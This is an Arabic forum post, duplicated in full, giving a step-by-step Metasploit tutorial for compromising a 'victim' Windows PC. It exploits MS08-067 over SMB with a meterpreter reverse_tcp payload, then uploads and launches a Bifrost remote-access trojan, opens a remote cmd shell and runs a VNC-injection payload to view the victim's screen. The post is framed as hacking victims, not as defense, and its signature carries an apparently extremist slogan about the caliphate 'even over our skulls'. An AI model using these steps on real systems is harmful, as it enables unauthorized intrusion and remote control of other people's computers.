الهلال منسي
02-20-2013, 10:31 PM
http://www.m5zn.com/image.php?img=10944490.jpg
بعد التحية والصلاه والسلام على سيد البشر
محمد صل الله عليه وسلم وعلى اله وصحبة اجميعن
اتيت اليكم بشرح لكيفية اختارق جهاز (http://www.3asfh.net/vb/t122794.html) الضحية (http://www.3asfh.net/vb/t122794.html)Metasploit ورفع (http://www.3asfh.net/vb/t122794.html) سيرفر (http://www.3asfh.net/vb/t122794.html) بيفروست
سأتحدث عن سيطرة الجهاز بإستخدام
playoad windows/vncinject
تم تطبيق الشرح على جهاز (http://www.3asfh.net/vb/t122794.html) افتراضي
الشرح
http://img194.imageshack.us/img194/9891/20090702183620.png
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
http://img27.imageshack.us/img27/5264/exploitscmd3.png
ونختار windows/smb/ms08_067_netapi
show payloads
http://img25.imageshack.us/img25/3329/payloads.png
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
والآن نقوم بتحديد IP الضحية (http://www.3asfh.net/vb/t122794.html) وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
http://img16.imageshack.us/img16/7027/setexploit5.png
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
http://img139.imageshack.us/img139/4131/launchexploit6.png
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
http://img139.imageshack.us/img139/4131/launchexploit6.png
لتشغيل السيرفر start server.exe
وكما توضح الصورة نجاح تحميل السيرفر
http://img37.imageshack.us/img37/6270/73006251.png
والصور تعبر عن نفسها
http://img190.imageshack.us/img190/6250/30769969.png
شاشة الضحية
http://img197.imageshack.us/img197/482/55987753.png
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
http://img269.imageshack.us/img269/1700/11vncinject.png
الموضوع منقول للفائدة شكرا لكاتب الموضوع
تحياتي وتقديري
تم بفضل من الله
كل مانرجو الدعاء في ضهر الغيب لوالديا ووالديكم
بالرحمه والمغفرة ولجميع المسلمين من المضلومين
اخوكم في الله والاسلام
الهلال منسي
الخلافة ولو على جماجمنا
الاختارق عبر الايب اخطر طبخة هكر طعمها مر على الضحية
http://www.m5zn.com/image.php?img=10944491.jpg
بعد التحية والصلاه والسلام على سيد البشر
محمد صل الله عليه وسلم وعلى اله وصحبة اجميعن
اتيت اليكم بشرح لكيفية اختارق جهاز (http://www.3asfh.net/vb/t122794.html) الضحية (http://www.3asfh.net/vb/t122794.html)Metasploit ورفع (http://www.3asfh.net/vb/t122794.html) سيرفر (http://www.3asfh.net/vb/t122794.html) بيفروست
سأتحدث عن سيطرة الجهاز بإستخدام
playoad windows/vncinject
تم تطبيق الشرح على جهاز (http://www.3asfh.net/vb/t122794.html) افتراضي
الشرح
http://img194.imageshack.us/img194/9891/20090702183620.png
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
http://img27.imageshack.us/img27/5264/exploitscmd3.png
ونختار windows/smb/ms08_067_netapi
show payloads
http://img25.imageshack.us/img25/3329/payloads.png
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
والآن نقوم بتحديد IP الضحية (http://www.3asfh.net/vb/t122794.html) وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
http://img16.imageshack.us/img16/7027/setexploit5.png
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
http://img139.imageshack.us/img139/4131/launchexploit6.png
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
http://img139.imageshack.us/img139/4131/launchexploit6.png
لتشغيل السيرفر start server.exe
وكما توضح الصورة نجاح تحميل السيرفر
http://img37.imageshack.us/img37/6270/73006251.png
والصور تعبر عن نفسها
http://img190.imageshack.us/img190/6250/30769969.png
شاشة الضحية
http://img197.imageshack.us/img197/482/55987753.png
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
http://img269.imageshack.us/img269/1700/11vncinject.png
الموضوع منقول للفائدة شكرا لكاتب الموضوع
تحياتي وتقديري
تم بفضل من الله
كل مانرجو الدعاء في ضهر الغيب لوالديا ووالديكم
بالرحمه والمغفرة ولجميع المسلمين من المضلومين
اخوكم في الله والاسلام
الهلال منسي
الخلافة ولو على جماجمنا
الاختارق عبر الايب اخطر طبخة هكر طعمها مر على الضحية
http://www.m5zn.com/image.php?img=10944491.jpg